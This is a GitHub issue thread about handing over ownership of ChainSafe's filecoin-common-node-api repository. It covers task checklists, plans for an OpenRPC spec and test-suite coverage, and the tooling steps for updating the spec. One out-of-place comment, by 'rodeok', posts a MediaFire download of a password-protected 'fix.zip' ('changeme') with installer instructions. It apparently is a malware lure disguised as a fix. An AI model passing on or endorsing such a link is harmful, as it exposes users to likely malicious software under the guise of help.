### ISSUE TITLE
Repo handover

### ISSUE THREAD

**Issue by LesnyRumcajs** [ChainSafe/filecoin-common-node-api#31]
Moving forward, @elmattic will take ownership of this repository. This requires quite a bit of knowledge transfer from @aatifsyed. This is tracked here.

> [!NOTE]  
> Ownership doesn't mean sole contributor. @elmattic, feel free to ask others to chip in, have an opinion and definitely review any changes. @elmattic, feel free to change propose any changes (even massive ones) and question everything. :)

Tasks:
- [x] @aatifsyed to write docs on what is the current status,
- [x] @aatifsyed to document and discuss with @elmattic the next 5-10 things that need to be done to push this initiative further,
- [x] @elmattic to prepare any questions, anything that is missing or is not clear
- [x] @aatifsyed and @elmattic to have a few hands-on sessions together to ensure the knowledge transfer is complete

Deadline: 6.09.2024

**Comment by rodeok** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by aatifsyed** [comment]
Notes before our first handover meeting:

1. Get a complete spec.
   This should be done all-at-once,
   but may have prerequisites depending on the approach.
  - [x] We have the full list of methods in
        [our spreadsheet](https://docs.google.com/spreadsheets/d/1fFkQuEjvFAd2s1dGX5zGmhxsEMLMUZ4uQFnIXgSZA5w/edit?usp=sharing).
  - [x] As of [`forest/#4677](https://github.com/ChainSafe/forest/pull/4677) and
        [`forest/#4692`](https://github.com/ChainSafe/forest/pull/4692),
        we have an OpenRPC description for every method in the list.
  - Forest splits these OpenRPC descriptions between `v0` and `v1`:
    `forest-tool shed openrpc --path ...`,
    and most of our methods are on `v0`.
    There is [some evidence](https://github.com/ChainSafe/forest/pull/4516) that
    there are meaningful differences between `v0` and `v1`,
    but also [some evidence](https://github.com/ChainSafe/forest/issues/4678#issuecomment-2306309344)
    that there isn't.
  - It is likely that differences won't affect us, but we should check, and
    ideally cover all the method's in Forest's CI.
  - There is a `tool openrpc select ...`
    [subcommand in the `filecoin-common-node-api repo](https://github.com/ChainSafe/filecoin-common-node-api/tree/b5f687f82da2273bc09e1a3085177da6783a8bc2/rust/tool#tool-openrpc-select),
    which takes a _single_ OpenRPC document as input,
    intended to produce a spec.
  - Possible paths forward are:
    - Hand-write the spec, manually looking out for differences in methods
      between v0 and v1,
      and flagging any [methods that are `v0` only](https://github.com/ChainSafe/filecoin-common-node-api/issues/7#issuecomment-2302329777)
      (we should only care about `v1` methods).
    - Get Forest an up-to-date `v1` API ([#4678](https://github.com/ChainSafe/forest/issues/4678)),
      at least for the methods in the list, that we test in CI,
      and use `tool openrpc select ...` to dump the spec.
2. Get (at least schema) coverage of all methods in the
   [`test-suite`](https://github.com/ChainSafe/filecoin-common-node-api/tree/b5f687f82da2273bc09e1a3085177da6783a8bc2/rust/test-suite).
   This can be done bit-by-bit,
   probably addressing bugs you find on the way.
  - This might require adding e.g snapshot fixtures to the suite.
  - This will [likely throw up bugs]
    (https://github.com/ChainSafe/filecoin-common-node-api/issues/18) in the spec,
    or in Forest, that need to be fixed.
  - This will [require implementation work](https://github.com/ChainSafe/forest/issues/4528)
    on the stubbed methdos in Forest.
3. Start picking up issues on the backlog,
   here's a suggested order:
  - https://github.com/ChainSafe/filecoin-common-node-api/issues/23.
  - https://github.com/ChainSafe/filecoin-common-node-api/issues/14
    (this can probably be done by using examples from the test suite.)

**Comment by aatifsyed** [comment]
Notes from our first meeting:

# We talked about how the spec is updated
1. `forest-tool shed openrpc --path ...` to dump the schemas to `./schemas`
2. `File -> Download -> Tab Separated Values` to download the method list from [google sheets](https://docs.google.com/spreadsheets/d/1fFkQuEjvFAd2s1dGX5zGmhxsEMLMUZ4uQFnIXgSZA5w/edit?gid=614592163#gid=614592163).
3. `tool openrpc csv2json ...` to convert the tsv to json.
4. `tool openrpc select ...` to trim the (currently `v0`, soon to be `v1`) schema in `./schemas` to output `spec.json`
5. `tool openrpc validate ...` to validate `spec.json`, and captured method calls (see https://github.com/ChainSafe/filecoin-common-node-api/issues/18 for how to run)

We did a walkthrough of the codebase :)

**Comment by elmattic** [comment]
@ansermino As suggested by me, the complete list of methods from the spreadsheet has been moved to [method-list.json](https://github.com/ChainSafe/filecoin-common-node-api/blob/main/misc/method-list.json). So we will do modifications there from now on.

**Comment by LesnyRumcajs** [comment]
@elmattic Do we consider this done?

**Comment by elmattic** [comment]
Yes, let's close this.
